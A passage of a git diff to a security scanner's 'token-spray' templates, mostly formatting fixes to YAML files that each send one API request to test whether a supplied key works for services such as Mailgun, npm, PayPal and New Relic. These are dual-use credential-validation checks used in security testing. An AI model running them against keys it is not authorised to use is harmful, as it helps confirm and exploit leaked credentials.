condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-hunter.yaml b/http/token-spray/api-hunter.yaml index 31a864699f..0f992e76ed 100644 --- a/http/token-spray/api-hunter.yaml +++ b/http/token-spray/api-hunter.yaml @@ -8,11 +8,12 @@ info: reference: - https://hunter.io/api-documentation/v2 - https://github.com/daffainfo/all-about-apikey/tree/main/hunter - tags: token-spray,hunter metadata: max-request: 1 + tags: token-spray,hunter self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-iconfinder.yaml b/http/token-spray/api-iconfinder.yaml index 103442970b..c3fd0d35cd 100644 --- a/http/token-spray/api-iconfinder.yaml +++ b/http/token-spray/api-iconfinder.yaml @@ -8,11 +8,12 @@ info: reference: - https://developer.iconfinder.com/reference/overview-1 - https://github.com/daffainfo/all-about-apikey/tree/main/iconfinder - tags: token-spray,iconfinder metadata: max-request: 1 + tags: token-spray,iconfinder self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-improvmx.yaml b/http/token-spray/api-improvmx.yaml index d61184f5cd..71f3944161 100644 --- a/http/token-spray/api-improvmx.yaml +++ b/http/token-spray/api-improvmx.yaml @@ -8,11 +8,12 @@ info: reference: - https://improvmx.com/api - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx - tags: token-spray,improvmx metadata: max-request: 1 + tags: token-spray,improvmx self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-instagram.yaml b/http/token-spray/api-instagram.yaml index 4bb9387b4f..6008ee4240 100644 --- a/http/token-spray/api-instagram.yaml +++ b/http/token-spray/api-instagram.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://developers.facebook.com/docs/instagram-api/getting-started - tags: token-spray,instagram,graph metadata: max-request: 1 + tags: token-spray,instagram,graph self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-instatus.yaml b/http/token-spray/api-instatus.yaml index 08be301602..878c9963d7 100644 --- a/http/token-spray/api-instatus.yaml +++ b/http/token-spray/api-instatus.yaml @@ -8,18 +8,19 @@ info: reference: - https://instatus.com/help/api - https://github.com/daffainfo/all-about-apikey/tree/main/instatus - tags: token-spray,instatus metadata: max-request: 1 + tags: token-spray,instatus self-contained: true + http: - method: GET path: - "https://api.instatus.com/v1/pages" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-intelx.yaml b/http/token-spray/api-intelx.yaml index 6a77504d92..c3db022bd3 100644 --- a/http/token-spray/api-intelx.yaml +++ b/http/token-spray/api-intelx.yaml @@ -11,19 +11,20 @@ info: - https://github.com/IntelligenceX/SDK - https://github.com/IntelligenceX/SDK/blob/master/Intelligence%20X%20API.pdf - https://intelx.io/account?tab=developer - tags: scan,recon,intelx,token-spray metadata: max-request: 1 + tags: scan,recon,intelx,token-spray self-contained: true + http: - method: GET path: - https://2.intelx.io/authenticate/info + headers: X-Key: "{{token}}" User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - matchers: - type: word part: body diff --git a/http/token-spray/api-intercom.yaml b/http/token-spray/api-intercom.yaml index c3ca118344..f9c5022b3e 100644 --- a/http/token-spray/api-intercom.yaml +++ b/http/token-spray/api-intercom.yaml @@ -6,19 +6,20 @@ info: severity: info reference: - https://developers.intercom.com/building-apps/docs/rest-api-reference - tags: token-spray,intercom metadata: max-request: 1 + tags: token-spray,intercom self-contained: true + http: - method: GET path: - "https://api.intercom.io/users" + headers: Authorization: Bearer {{token}} Accept: application/json - matchers: - type: word part: body diff --git a/http/token-spray/api-ip2whois.yaml b/http/token-spray/api-ip2whois.yaml index be129b00f6..cad7665d40 100644 --- a/http/token-spray/api-ip2whois.yaml +++ b/http/token-spray/api-ip2whois.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.ip2whois.com/developers-api - https://github.com/daffainfo/all-about-apikey/tree/main/ip2whois - tags: token-spray,ip2whois metadata: max-request: 1 + tags: token-spray,ip2whois self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-ipdata.yaml b/http/token-spray/api-ipdata.yaml index 9d89d3e09c..ce69acf84c 100644 --- a/http/token-spray/api-ipdata.yaml +++ b/http/token-spray/api-ipdata.yaml @@ -7,11 +7,12 @@ info: reference: - https://docs.ipdata.co/docs metadata: - max-request: 1 verified: true + max-request: 1 tags: token-spray,ipdata self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-ipfind.yaml b/http/token-spray/api-ipfind.yaml index 22ec4037b7..4fc66b6326 100644 --- a/http/token-spray/api-ipfind.yaml +++ b/http/token-spray/api-ipfind.yaml @@ -8,11 +8,12 @@ info: reference: - https://ipfind.io/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/ipfind - tags: token-spray,ipfind metadata: max-request: 1 + tags: token-spray,ipfind self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-ipinfo.yaml b/http/token-spray/api-ipinfo.yaml index 9a940d3385..0edaffadeb 100644 --- a/http/token-spray/api-ipinfo.yaml +++ b/http/token-spray/api-ipinfo.yaml @@ -7,15 +7,17 @@ info: reference: - https://ipinfo.io/developers metadata: - max-request: 1 verified: true + max-request: 1 tags: token-spray,ipinfo self-contained: true + http: - method: GET path: - "https://ipinfo.io/?token={{token}}" + matchers: - type: word part: body diff --git a/http/token-spray/api-ipstack.yaml b/http/token-spray/api-ipstack.yaml index b6b161f509..237e15b123 100644 --- a/http/token-spray/api-ipstack.yaml +++ b/http/token-spray/api-ipstack.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://ipstack.com/documentation - tags: token-spray,ipstack metadata: max-request: 1 + tags: token-spray,ipstack self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-iterable.yaml b/http/token-spray/api-iterable.yaml index 18d821592e..7f54ec0a7e 100644 --- a/http/token-spray/api-iterable.yaml +++ b/http/token-spray/api-iterable.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://api.iterable.com/api/docs - tags: token-spray,iterable metadata: max-request: 1 + tags: token-spray,iterable self-contained: true + http: - method: GET path: - "https://api.iterable.com/api/catalogs" + headers: Api_Key: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-iucn.yaml b/http/token-spray/api-iucn.yaml index beac8ff8c7..c096a98e94 100644 --- a/http/token-spray/api-iucn.yaml +++ b/http/token-spray/api-iucn.yaml @@ -8,11 +8,12 @@ info: reference: - http://apiv3.iucnredlist.org/api/v3/docs - https://github.com/daffainfo/all-about-apikey/tree/main/iucn - tags: token-spray,iucn metadata: max-request: 1 + tags: token-spray,iucn self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-jsonbin.yaml b/http/token-spray/api-jsonbin.yaml index a0257150ff..39fa792c2a 100644 --- a/http/token-spray/api-jsonbin.yaml +++ b/http/token-spray/api-jsonbin.yaml @@ -8,11 +8,12 @@ info: reference: - https://jsonbin.io/api-reference - https://github.com/daffainfo/all-about-apikey/tree/main/jsonbin - tags: token-spray,jsonbin metadata: max-request: 1 + tags: token-spray,jsonbin self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-jumpcloud.yaml b/http/token-spray/api-jumpcloud.yaml index dc760f945f..2e5c7ad2bc 100644 --- a/http/token-spray/api-jumpcloud.yaml +++ b/http/token-spray/api-jumpcloud.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://docs.jumpcloud.com/1.0/authentication-and-authorization/api-key - tags: token-spray,jumpcloud metadata: max-request: 1 + tags: token-spray,jumpcloud self-contained: true + http: - method: GET path: - "https://console.jumpcloud.com/api/systems" + headers: X-Api-Key: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-launchdarkly.yaml b/http/token-spray/api-launchdarkly.yaml index ae0f70f3a4..5e03dcc632 100644 --- a/http/token-spray/api-launchdarkly.yaml +++ b/http/token-spray/api-launchdarkly.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://apidocs.launchdarkly.com/ - tags: token-spray,launchdarkly metadata: max-request: 1 + tags: token-spray,launchdarkly self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-leanix.yaml b/http/token-spray/api-leanix.yaml index 4d19549203..caa5a64cee 100644 --- a/http/token-spray/api-leanix.yaml +++ b/http/token-spray/api-leanix.yaml @@ -6,19 +6,20 @@ info: severity: info reference: - https://docs.leanix.net/docs/rest-api - tags: token-spray,leanix metadata: max-request: 2 + tags: token-spray,leanix self-contained: true + http: - method: GET path: - "https://us.leanix.net/services/integration-api/v1/examples/starterExample" - "https://eu.leanix.net/services/integration-api/v1/examples/starterExample" + headers: Authorization: Bearer {{token}} - stop-at-first-match: true matchers: - type: word @@ -26,4 +27,4 @@ http: words: - '"input":' - '"connectorType":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-linkedin.yaml b/http/token-spray/api-linkedin.yaml index d51f183bca..dd8b41096f 100644 --- a/http/token-spray/api-linkedin.yaml +++ b/http/token-spray/api-linkedin.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://docs.microsoft.com/en-us/linkedin/compliance/ - tags: token-spray,linkedin metadata: max-request: 1 + tags: token-spray,linkedin self-contained: true + http: - method: GET path: @@ -28,4 +29,4 @@ http: - '"id":' - '"firstName":' - '"localized":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-lob.yaml b/http/token-spray/api-lob.yaml index 04fbcb5a31..ecda7d508d 100644 --- a/http/token-spray/api-lob.yaml +++ b/http/token-spray/api-lob.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.lob.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/lob - tags: token-spray,lob metadata: max-request: 1 + tags: token-spray,lob self-contained: true + http: - raw: - | @@ -27,4 +28,4 @@ http: - '"id"' - '"description"' - '"name"' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-lokalise.yaml b/http/token-spray/api-lokalise.yaml index 4c5c9808b0..422a96d339 100644 --- a/http/token-spray/api-lokalise.yaml +++ b/http/token-spray/api-lokalise.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://app.lokalise.com/api2docs/curl/#resource-projects - tags: token-spray,lokalise metadata: max-request: 1 + tags: token-spray,lokalise self-contained: true + http: - method: GET path: - "https://api.lokalise.com/api2/teams" + headers: x-api-Token: "{{token}}" - matchers: - type: word part: body @@ -25,4 +26,4 @@ http: - '"teams":' - '"team_id":' - '"name":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-mac-address-lookup.yaml b/http/token-spray/api-mac-address-lookup.yaml index d73f330b58..8c05312e0e 100644 --- a/http/token-spray/api-mac-address-lookup.yaml +++ b/http/token-spray/api-mac-address-lookup.yaml @@ -8,11 +8,12 @@ info: reference: - https://macaddress.io/api - https://github.com/daffainfo/all-about-apikey/tree/main/mac-address-lookup - tags: token-spray,macaddresslookup metadata: max-request: 1 + tags: token-spray,macaddresslookup self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-mailboxvalidator.yaml b/http/token-spray/api-mailboxvalidator.yaml index ab62289093..0d0d50fd58 100644 --- a/http/token-spray/api-mailboxvalidator.yaml +++ b/http/token-spray/api-mailboxvalidator.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.mailboxvalidator.com/api-email-free - https://github.com/daffainfo/all-about-apikey/tree/main/mailboxvalidator - tags: token-spray,mailboxvalidator metadata: max-request: 1 + tags: token-spray,mailboxvalidator self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-mailchimp.yaml b/http/token-spray/api-mailchimp.yaml index aba5a10f54..0974bd7f34 100644 --- a/http/token-spray/api-mailchimp.yaml +++ b/http/token-spray/api-mailchimp.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration - tags: token-spray,mailchimp metadata: max-request: 1 + tags: token-spray,mailchimp self-contained: true tcp: @@ -17,7 +17,6 @@ tcp: read: 1024 host: - "tls://smtp.mandrillapp.com:465" - matchers: - type: word words: diff --git a/http/token-spray/api-mailgun.yaml b/http/token-spray/api-mailgun.yaml index 10af3c513e..0484860c48 100644 --- a/http/token-spray/api-mailgun.yaml +++ b/http/token-spray/api-mailgun.yaml @@ -8,18 +8,19 @@ info: reference: - https://documentation.mailgun.com/en/latest/api-intro.html - https://github.com/daffainfo/all-about-apikey/tree/main/mailgun - tags: token-spray,mailgun metadata: max-request: 1 + tags: token-spray,mailgun self-contained: true + http: - method: GET path: - "https://api.mailgun.net/v3/domains" + headers: Authorization: Basic {{base64('api:' + token)}} - matchers: - type: word part: body diff --git a/http/token-spray/api-malshare.yaml b/http/token-spray/api-malshare.yaml index e1883d6df9..dd9392f51f 100644 --- a/http/token-spray/api-malshare.yaml +++ b/http/token-spray/api-malshare.yaml @@ -8,11 +8,12 @@ info: reference: - https://malshare.com/doc.php - https://github.com/daffainfo/all-about-apikey/tree/main/malshare - tags: token-spray,malshare metadata: max-request: 1 + tags: token-spray,malshare self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-malwarebazaar.yaml b/http/token-spray/api-malwarebazaar.yaml index 4e8f9f56f6..a30ee8f19f 100644 --- a/http/token-spray/api-malwarebazaar.yaml +++ b/http/token-spray/api-malwarebazaar.yaml @@ -8,11 +8,12 @@ info: reference: - https://bazaar.abuse.ch/api/ - https://github.com/daffainfo/all-about-apikey/tree/main/malwarebazaar - tags: token-spray,malwarebazaar metadata: max-request: 1 + tags: token-spray,malwarebazaar,intrusive self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-mapbox.yaml b/http/token-spray/api-mapbox.yaml index ff3a6f0efb..d740a254bd 100644 --- a/http/token-spray/api-mapbox.yaml +++ b/http/token-spray/api-mapbox.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://docs.mapbox.com/api/search/geocoding/ - tags: token-spray,mapbox metadata: max-request: 1 + tags: token-spray,mapbox self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-micro-user-service.yaml b/http/token-spray/api-micro-user-service.yaml index 233819a170..3f74eb2f2f 100644 --- a/http/token-spray/api-micro-user-service.yaml +++ b/http/token-spray/api-micro-user-service.yaml @@ -8,11 +8,12 @@ info: reference: - https://m3o.com/user - https://github.com/daffainfo/all-about-apikey/tree/main/micro-user-service - tags: token-spray,micro-user-service metadata: max-request: 1 + tags: token-spray,micro-user-service self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-mojoauth.yaml b/http/token-spray/api-mojoauth.yaml index a119e5162e..67e2e365e5 100644 --- a/http/token-spray/api-mojoauth.yaml +++ b/http/token-spray/api-mojoauth.yaml @@ -8,11 +8,12 @@ info: reference: - https://mojoauth.com/docs/ - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth - tags: token-spray,mojoauth metadata: max-request: 1 + tags: token-spray,mojoauth self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-monday.yaml b/http/token-spray/api-monday.yaml index 8e772fd12f..3c5891f479 100644 --- a/http/token-spray/api-monday.yaml +++ b/http/token-spray/api-monday.yaml @@ -8,11 +8,12 @@ info: reference: - https://api.developer.monday.com/docs - https://github.com/daffainfo/all-about-apikey/tree/main/monday - tags: token-spray,monday metadata: max-request: 1 + tags: token-spray,monday self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-moonpay.yaml b/http/token-spray/api-moonpay.yaml index ee9be1385b..e2f96972b4 100644 --- a/http/token-spray/api-moonpay.yaml +++ b/http/token-spray/api-moonpay.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://dashboard.moonpay.com/getting_started - tags: token-spray,moonpay,cryptocurrencies metadata: max-request: 1 + tags: token-spray,moonpay,cryptocurrencies self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-myanimelist.yaml b/http/token-spray/api-myanimelist.yaml index b7b53eb103..99f3b6df12 100644 --- a/http/token-spray/api-myanimelist.yaml +++ b/http/token-spray/api-myanimelist.yaml @@ -8,18 +8,19 @@ info: reference: - https://myanimelist.net/apiconfig/references/api/v2 - https://github.com/daffainfo/all-about-apikey/tree/main/myanimelist - tags: token-spray,myanimelist metadata: max-request: 1 + tags: token-spray,myanimelist self-contained: true + http: - method: GET path: - "https://api.myanimelist.net/v2/anime?q=one&limit=4" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-mywot.yaml b/http/token-spray/api-mywot.yaml index 4b12c4c32a..910773fe2b 100644 --- a/http/token-spray/api-mywot.yaml +++ b/http/token-spray/api-mywot.yaml @@ -8,11 +8,12 @@ info: reference: - https://support.mywot.com/hc/en-us/sections/360004477734-API- - https://github.com/daffainfo/all-about-apikey/tree/main/web-of-trust - tags: token-spray,weboftrust metadata: max-request: 1 + tags: token-spray,weboftrust self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-nerdgraph.yaml b/http/token-spray/api-nerdgraph.yaml index d7a357eda9..c920c259f6 100644 --- a/http/token-spray/api-nerdgraph.yaml +++ b/http/token-spray/api-nerdgraph.yaml @@ -6,20 +6,22 @@ info: severity: info reference: - https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ - tags: token-spray,newrelic,nerdgraph metadata: max-request: 1 + tags: token-spray,newrelic,nerdgraph self-contained: true + http: - method: POST path: - "https://api.newrelic.com/graphql" + headers: Content-Type: application/json API-Key: "{{token}}" - body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }" + body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }" matchers: - type: word part: body diff --git a/http/token-spray/api-netlify.yaml b/http/token-spray/api-netlify.yaml index 865892148a..1dc08bf603 100644 --- a/http/token-spray/api-netlify.yaml +++ b/http/token-spray/api-netlify.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://docs.netlify.com/api/get-started/ - tags: token-spray,netlify metadata: max-request: 1 + tags: token-spray,netlify self-contained: true + http: - method: GET path: - "https://api.netlify.com/api/v1/sites" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-networksdb.yaml b/http/token-spray/api-networksdb.yaml index 083de16298..862e63f04c 100644 --- a/http/token-spray/api-networksdb.yaml +++ b/http/token-spray/api-networksdb.yaml @@ -8,11 +8,12 @@ info: reference: - https://networksdb.io/api/docs metadata: - max-request: 1 verified: true + max-request: 1 tags: token-spray,networkdb self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-newrelic.yaml b/http/token-spray/api-newrelic.yaml index 578a7c4e40..0a3c11d2e2 100644 --- a/http/token-spray/api-newrelic.yaml +++ b/http/token-spray/api-newrelic.yaml @@ -7,11 +7,12 @@ info: reference: - https://docs.newrelic.com/docs/apis/rest-api-v2/application-examples-v2/list-your-app-id-metric-timeslice-data-v2 metadata: - max-request: 1 verified: true + max-request: 1 tags: token-spray,newrelic self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-notolytix.yaml b/http/token-spray/api-notolytix.yaml index 29f4298b3f..c5531fc816 100644 --- a/http/token-spray/api-notolytix.yaml +++ b/http/token-spray/api-notolytix.yaml @@ -11,13 +11,14 @@ info: tags: notolytix,token-spray self-contained: true + http: - method: GET path: - "https://api.notolytix.com/1.0/deviceid" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-nownodes.yaml b/http/token-spray/api-nownodes.yaml index 0ecf115c1e..8357567c8d 100644 --- a/http/token-spray/api-nownodes.yaml +++ b/http/token-spray/api-nownodes.yaml @@ -8,11 +8,12 @@ info: reference: - https://nownodes.io/ - https://github.com/daffainfo/all-about-apikey/tree/main/nownodes - tags: token-spray,nownodes metadata: max-request: 1 + tags: token-spray,nownodes self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-npm.yaml b/http/token-spray/api-npm.yaml index 26e7024a70..1ed5d3b97b 100644 --- a/http/token-spray/api-npm.yaml +++ b/http/token-spray/api-npm.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://docs.npmjs.com/creating-and-viewing-access-tokens - tags: token-spray,node,npm metadata: max-request: 1 + tags: token-spray,node,npm self-contained: true + http: - method: GET path: - "https://registry.npmjs.org/-/whoami" + headers: Authorization: Bearer {{token}} - matchers: - type: status status: diff --git a/http/token-spray/api-nytimes.yaml b/http/token-spray/api-nytimes.yaml index fa2f261ca4..a5e87e39b5 100644 --- a/http/token-spray/api-nytimes.yaml +++ b/http/token-spray/api-nytimes.yaml @@ -7,11 +7,12 @@ info: description: NYTimes API Test reference: - https://developer.nytimes.com/apis - tags: token-spray,nytimes metadata: max-request: 1 + tags: token-spray,nytimes self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-onelogin.yaml b/http/token-spray/api-onelogin.yaml index 2ae296a1b8..f4957c8527 100644 --- a/http/token-spray/api-onelogin.yaml +++ b/http/token-spray/api-onelogin.yaml @@ -6,19 +6,20 @@ info: severity: info reference: - https://developers.onelogin.com/api-docs/2/getting-started/dev-overview - tags: token-spray,onelogin metadata: max-request: 2 + tags: token-spray,onelogin self-contained: true + http: - method: GET path: - "https://api.us.onelogin.com/api/2/apps" - "https://api.eu.onelogin.com/api/2/apps" + headers: Authorization: Bearer {{token}} - stop-at-first-match: true matchers: - type: word diff --git a/http/token-spray/api-open-page-rank.yaml b/http/token-spray/api-open-page-rank.yaml index 313c9d4a7c..2950c68e5a 100644 --- a/http/token-spray/api-open-page-rank.yaml +++ b/http/token-spray/api-open-page-rank.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.domcop.com/openpagerank/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/open-page-rank - tags: token-spray,openpagerank metadata: max-request: 1 + tags: token-spray,openpagerank self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-opengraphr.yaml b/http/token-spray/api-opengraphr.yaml index b3bbc5c98d..dfec3f535f 100644 --- a/http/token-spray/api-opengraphr.yaml +++ b/http/token-spray/api-opengraphr.yaml @@ -8,11 +8,12 @@ info: reference: - https://opengraphr.com/docs/1.0/overview - https://github.com/daffainfo/all-about-apikey/tree/main/opengraphr - tags: token-spray,opengraphr metadata: max-request: 1 + tags: token-spray,opengraphr self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-openweather.yaml b/http/token-spray/api-openweather.yaml index 1ebdaa2e85..fa44be92fa 100644 --- a/http/token-spray/api-openweather.yaml +++ b/http/token-spray/api-openweather.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://openweathermap.org/current - tags: token-spray,weather,openweather metadata: max-request: 1 + tags: token-spray,weather,openweather self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-opsgenie.yaml b/http/token-spray/api-opsgenie.yaml index 888a69f50b..ab2a588f9c 100644 --- a/http/token-spray/api-opsgenie.yaml +++ b/http/token-spray/api-opsgenie.yaml @@ -7,18 +7,19 @@ info: description: Forex currency market data reference: - https://docs.opsgenie.com/docs/api-overview - tags: token-spray,opsgenie metadata: max-request: 1 + tags: token-spray,opsgenie self-contained: true + http: - method: GET path: - "https://api.opsgenie.com/v2/alerts" + headers: Authorization: GenieKey {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-optimizely.yaml b/http/token-spray/api-optimizely.yaml index e18c3af563..19cf1b7b13 100644 --- a/http/token-spray/api-optimizely.yaml +++ b/http/token-spray/api-optimizely.yaml @@ -6,15 +6,17 @@ info: severity: info reference: - https://library.optimizely.com/docs/api/app/v2/index.html - tags: token-spray,optimizely metadata: max-request: 1 + tags: token-spray,optimizely self-contained: true + http: - method: GET path: - "https://api.optimizely.com/v2/projects" + headers: Authorization: Bearer {{token}} @@ -29,4 +31,4 @@ http: words: - '"account_id":' - '"confidence_threshold":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-orbintelligence.yaml b/http/token-spray/api-orbintelligence.yaml index 34ff4024a3..a7d6cd1ff1 100644 --- a/http/token-spray/api-orbintelligence.yaml +++ b/http/token-spray/api-orbintelligence.yaml @@ -8,11 +8,12 @@ info: reference: - https://api.orb-intelligence.com/docs/ - https://github.com/daffainfo/all-about-apikey/tree/main/orb-intelligence - tags: token-spray,orbintelligence metadata: max-request: 1 + tags: token-spray,orbintelligence self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-pagecdn.yaml b/http/token-spray/api-pagecdn.yaml index dd143f6ee4..75b6a90f7e 100644 --- a/http/token-spray/api-pagecdn.yaml +++ b/http/token-spray/api-pagecdn.yaml @@ -8,11 +8,12 @@ info: reference: - https://pagecdn.com/docs/public-api - https://github.com/daffainfo/all-about-apikey/tree/main/pagecdn - tags: token-spray,pagecdn metadata: max-request: 1 + tags: token-spray,pagecdn self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-pagerduty.yaml b/http/token-spray/api-pagerduty.yaml index fc3a8b2474..d04e6b81e7 100644 --- a/http/token-spray/api-pagerduty.yaml +++ b/http/token-spray/api-pagerduty.yaml @@ -6,19 +6,20 @@ info: severity: info reference: - https://developer.pagerduty.com/api-reference - tags: token-spray,pagerduty metadata: max-request: 1 + tags: token-spray,pagerduty self-contained: true + http: - method: GET path: - "https://api.pagerduty.com/schedules" + headers: Accept: application/vnd.pagerduty+json;version=2 Authorization: Token token={{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-particle.yaml b/http/token-spray/api-particle.yaml index 8745a9f5e8..efd4b78288 100644 --- a/http/token-spray/api-particle.yaml +++ b/http/token-spray/api-particle.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://docs.particle.io/reference - tags: token-spray,particle metadata: max-request: 1 + tags: token-spray,particle self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-pastebin.yaml b/http/token-spray/api-pastebin.yaml index 6bf5fe9cd5..d1944b21cd 100644 --- a/http/token-spray/api-pastebin.yaml +++ b/http/token-spray/api-pastebin.yaml @@ -8,11 +8,12 @@ info: reference: - https://pastebin.com/doc_api - https://github.com/daffainfo/all-about-apikey/tree/main/pastebin - tags: token-spray,pastebin metadata: max-request: 1 + tags: token-spray,pastebin self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-paypal.yaml b/http/token-spray/api-paypal.yaml index 9f749dbc2b..53c5cfa0df 100644 --- a/http/token-spray/api-paypal.yaml +++ b/http/token-spray/api-paypal.yaml @@ -6,15 +6,17 @@ info: severity: info reference: - https://developer.paypal.com/docs/api/overview/ - tags: token-spray,paypal metadata: max-request: 1 + tags: token-spray,paypal self-contained: true + http: - method: GET path: - "https://api-m.sandbox.paypal.com/v1/identity/oauth2/userinfo?schema=paypalv1.1" + headers: Content-Type: application/json Authorization: Bearer {{token}} @@ -28,4 +30,4 @@ http: - type: regex negative: true regex: - - "error(_description)?" \ No newline at end of file + - "error(_description)?" diff --git a/http/token-spray/api-pdflayer.yaml b/http/token-spray/api-pdflayer.yaml index 12dc0aa883..e9a40031e8 100644 --- a/http/token-spray/api-pdflayer.yaml +++ b/http/token-spray/api-pdflayer.yaml @@ -8,11 +8,12 @@ info: reference: - https://pdflayer.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/pdflayer - tags: token-spray,pdflayer metadata: max-request: 1 + tags: token-spray,pdflayer self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-pendo.yaml b/http/token-spray/api-pendo.yaml index 5d528ef496..f4b845d3aa 100644 --- a/http/token-spray/api-pendo.yaml +++ b/http/token-spray/api-pendo.yaml @@ -6,23 +6,24 @@ info: severity: info reference: - https://help.pendo.io/resources/support-library/api/index.html - tags: token-spray,pendo metadata: max-request: 1 + tags: token-spray,pendo self-contained: true + http: - method: GET path: - "https://app.pendo.io/api/v1/feature" + headers: Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" - matchers: - type: word part: body words: - '"createdByUser":' - '"id":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-petfinder.yaml b/http/token-spray/api-petfinder.yaml index d8e710ed69..0f33326625 100644 --- a/http/token-spray/api-petfinder.yaml +++ b/http/token-spray/api-petfinder.yaml @@ -8,20 +8,21 @@ info: reference: - https://www.petfinder.com/developers/v2/docs/ - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder - tags: token-spray,petfinder metadata: max-request: 1 + tags: token-spray,petfinder self-contained: true + http: - raw: - | - POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 - Host: api.petfinder.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 + POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 + Host: api.petfinder.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 - grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} + grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} matchers: - type: word diff --git a/http/token-spray/api-pinata.yaml b/http/token-spray/api-pinata.yaml index 79262f441d..53ee8795f1 100644 --- a/http/token-spray/api-pinata.yaml +++ b/http/token-spray/api-pinata.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.pinata.cloud/ - https://github.com/daffainfo/all-about-apikey/tree/main/pinata - tags: token-spray,pinata metadata: max-request: 1 + tags: token-spray,pinata self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-pivotaltracker.yaml b/http/token-spray/api-pivotaltracker.yaml index 6da7b49e65..729fd1887b 100644 --- a/http/token-spray/api-pivotaltracker.yaml +++ b/http/token-spray/api-pivotaltracker.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://www.pivotaltracker.com/help/api - tags: token-spray,pivotaltracker metadata: max-request: 1 + tags: token-spray,pivotaltracker self-contained: true + http: - method: GET path: - "https://www.pivotaltracker.com/services/v5/me" + headers: X-TrackerToken: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-postmark.yaml b/http/token-spray/api-postmark.yaml index a6f25bd759..79af272094 100644 --- a/http/token-spray/api-postmark.yaml +++ b/http/token-spray/api-postmark.yaml @@ -6,19 +6,20 @@ info: severity: info reference: - 